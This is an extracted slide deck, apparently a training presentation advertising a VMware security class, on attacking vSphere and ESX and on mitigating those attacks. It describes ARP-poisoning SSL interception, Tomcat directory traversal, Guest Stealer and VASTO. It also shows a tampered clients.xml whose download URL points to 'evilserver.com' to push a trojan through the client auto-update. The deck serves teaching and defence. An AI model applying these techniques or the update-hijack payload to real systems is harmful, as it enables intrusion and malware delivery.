VASTO - VMware

Report
 Free Drawing for 1 seat in the VMware Advanced
Security Class with Firebrand.
 vSphere Just Another Layer to Attack?
 Recent Cases involving VMware
 Pen Testing Methodology
 Gueststealer
 TomCat Zero Day
 Directory Traversal
 VASTO
 Mitigation Techniques
 3rd Party Mitigation Tools
 VMware – 80% of the Market Share
 Do the Tools used in Pen Testing work with
virtualization?
 Are there hacks being designed just for VMware?
 What is this costing us?
Hackin9 – Issue 01/2011(37)
• CyberCrime and CyberWar
Predictions for 2011
• #2 – Cloud Computing and Virtual
Machines (VM) will be specifically
targeted by cybercriminals and cyber
terrorists resulting in VM malware
and Cloud downtime and Cloud data
theft.
 What are the main security concerns associated with
virtualization in general?
 Segregation of Duties
 Accounting/Logging
 New API’s
 VMsafe
 vStorage
 vNetwork
 VMsafe Virtual Appliances
 Plug-Ins
 Share Resources – can they be attacked?
 Memory, CPU, Datastore
Management
Interfaces
• vSphere Client
• API’s
• Plugin’s - VMware
• Update Manager
• Guided Consolidation
• VMware Converter
• Storage vMotion
• Plugin’s - 3rd Party
• Back Up Solutions (3rd Party - Veeam)
• RDP - (3rd Party - The RDP plug-in, by
Juxtaposition)
• Invoke Plugin
ESX and vCenter
both use a Web
Service
• vCenter on by
default – Why?
• ESX disabled –
Thank God
Tomcat Web
Service
• How many holes
have we found
here? WOW
Utilizes a Proxy
• The is the same
proxy used by
hostd.
VMware is using an old
version of TomCat that leaves
the username and password
in a world readable file!
Fixed by a recent update for
vCenter 4.1
VMCI, or Virtual Machine Communications
Interface is an interface designed in the hardware
of a VM.
• It provides communication between VMs and trusted
endpoints on the host, and from VM to VM. The vmkernel
is considered a trusted end-point.
• This interface is implemented as a virtual PCI device,
present by default in all VMs created with virtual
hardware version 7.
http://pubs.vmware.com/vmci-sdk/VMCI_intro.html
 Threats
 Perceived
 Known
 Risks
 Probability
 Potential Impact
 Secunia Historic Advisories
 ESX 4.x
 ESXi 4.x
 vCenter Server 4.x
 nvd.nist.gov
 Over 40 Vulnerabilities for VMware Products
 McAfee Threats
 VMware
 ESX Server Heap Buffer Overflow
 vCenter Update Manager CSS
 vCenter Update Manager Directory Traversal
130 Million Credit Cards Stolen – Gonzalez
Indictment
•
•
•
•
•
•
•
SQL Injection Attacks
SQL Injection Strings
Malware
Root kits
Visiting the stores
Disabling the logs
Using Proxies
Little Known Fact:
Occurred on VMware!!!!
 This does not change, regardless of the environment
being tested.




Information Gathering
Scanning
Enumeration
Penetration
 Fail
 Start Over or tell them great job
 Succeed




Escalate Privileges
Steal Data or Leave proof of hack
Cover Tracks
Leave Backdoors
 Google
 NMAP – Since v4.8
 Ettercap
 Cain and Abel
 Metasploit
 Claudio Criscione
 VASTO – Virtualization ASsessment
TOolkit
 We have to find the systems first.
 Just like any other service, ESX has its own tells.
 NMAP – will give you what you need.
 Lets see this in action!
Auxiliary
Modules
Meterpreter
• Yes you can create your own modules.
• We will take a look at VASTO – Virtualization
ASsessment Toolkit by Claudio Criscione
• The purpose of meterpreter scripts are to give end-users
an easy interface to write quick scripts that can be run
against remote targets after successful exploitation.
(Metasploit)
• Meterpreter is an effective tool for creating backdoors.
ESX
Sever
SSL request
SSL request
Stop
SSL reply
(Fake certificate)
F&JLMDHGST*KU
Copy &
Alter
Cleartext
SSL reply
(Real Self Signed Cert)
P)JDGH$FDSD@
 ARP Cache Poisoning will allow us to perform a successful SSL
crack!
 The hacking tools will create fake certificates.
 Two simultaneous SSL connections are established. One between
the victim and the hacker, the other between the hacker and the real
server.
 The communication process starts on port 443 and once the SSL
authentication has been established VMware moves the
communication to port 902.
 VIC
Client
Login
 You are still vulnerable even if you use vCenter.
 I can offer this:
 Once the above password is stolen you can login to
the host with the vpxuser and above password.
VULNERABLE VERSIONS
•
•
•
•
•
•
•
Server
VMware Server 2.x < 2.0.2 build 203138 (Linux)
VMware Server 1.x < 1.0.10 build 203137 (Linux)
ESX/ESXi
ESX 3.5 w/o ESX350-200901401-SG
ESX 3.0.3 w/o ESX303-200812406-BG
ESXi 3.5 w/o ESXe350-200901401-I-SG
GuestStealer
Dictionary
Attack
Fingerprinting
Tool
• Thanks for the Virtual
Machines!
• How Large is your
dictionary file?
• Need to know exactly
what is running?
Client
Server
GET /client/clients.xml
1
AutoUpdate URL
RetrieveServiceInstance
2
ServiceInstance
RetrieveServiceStatus
3
Status
GET /client/clients.xml
4
Autoupdate URL
Login
Auto Update Process
• <patchVersion>3.0.0</patchVersion>
• <apiVersion>3.1.0</apiVersion>
• <downloadUrl>https://*/client/VMware-viclient.exe</downloadUrl>
The Auto
Update Process
The Evil Guy
• <patchVersion>3.0.0</patchVersion>
• <apiVersion>3.1.0</apiVersion>
• <downloadUrl>https://*/client/VMwareviclient.exe</downloadUrl>
• <patchVersion>10.0.0</patchVersion>
• <apiVersion>3.1.0</apiVersion>
• <downloadUrl>https://evilserver.com/evilpay
poad.exe</downloadUrl>
Change the
clients.xml filename
The package will run
under the user’s
privilege!
• Administrator Anyone?
Provide your nasty
trojan package.
• Could be combined with
other attacks.
You will trigger a
“certificate error”
This can be done as
MiTM or Rouge
Server
Create a fake web
interface so you look
ligit!
Autopwn – How easy can
it get?
Uses a flaw in the
Tomcat Web Server
Transfers the Latest
Session File from
vCenter using a
Directory Traversal
Attack.
Admin rights without
knowing a username or
password!
Mitigation
Tools –
Best of the
Breed
• Vmware
• vShield Zones
• 3rd Party
• Altor
• Reflex
• CheckPoint
• Astaro Security Gateway
• Tripwire
• Catbird
• HyTrust
 Trend Micro Deep Security provides advanced security
for physical, virtual, and cloud servers and virtual
desktops.
 Modules
 Agentless Malware Detection for VMs
 Deep Packet Inspection
 Intrusion Detection and Prevention
 Web Application and Protection
 Application Control
 Bidirectional Stateful Firewall
 Integrity Monitoring
 Log Inspection
Catbird TrustZones® policybased security envelope for
virtual infrastructures and the
cloud. Enforces protection and
measures compliance across
virtual clusters and data centers.
Catbird virtual security appliance
performs several functions:
 Hypervisor auditing
 Virtual network IPS
 Network segmentation and
access control
 Vulnerability management
 Multi-tenant security
 Reports to management console
 Catbird appliances collect data and enforce policies
 Appliances report events to management console
 Management console analyses events and
correlates to compliance framework
Course Introduction and Methodology
2. Penetration Testing 101
3. Primer and Reaffirming our Knowledge
4. Security Architecture, vCPU, vMemory
5. Routing and the vNetwork
6. vStorage – Architecture and Security Implementations
7. Hardening the Virtual Machines
8. Hardening the Host
9. Hardening Virtual Center
10. Virtualizing your DMZ
11. 3rd Party Mitigation Tools
12. Putting it all Together
1.
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
Course Intro & Methodology
Virtualization Overview
Planning & Installing ESX/ESXi 4
Using Tools to Administer a VMware Environment
Configuring Networking
Configuring Storage
vCenter Server 4 and Licensing
VM Creation and Configuration & Snapshots
Security and Permissions
Server and VM Monitoring
Advanced ESX and vCenter Management
Patching and Upgrading ESX/ESXi
Disaster Recovery and Backup
50 Hours of Training – 6.5 Classes in ONE
Does vSphere
really have some
major issues?
Recent Cases
involving ESX
Pen Testing
Methodology
Web Related
issues
VASTO
Mitigation
techniques
Questions?

similar documents